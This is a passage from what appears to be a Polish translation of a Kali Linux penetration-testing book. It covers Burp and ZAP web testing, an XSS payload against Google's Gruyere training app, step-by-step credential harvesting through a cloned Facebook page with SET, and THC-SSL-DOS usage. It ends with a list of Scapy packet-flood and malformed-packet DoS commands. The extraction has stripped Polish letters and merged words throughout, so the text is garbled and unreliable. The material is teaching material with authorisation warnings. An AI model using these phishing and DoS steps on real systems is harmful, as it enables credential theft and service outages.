Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

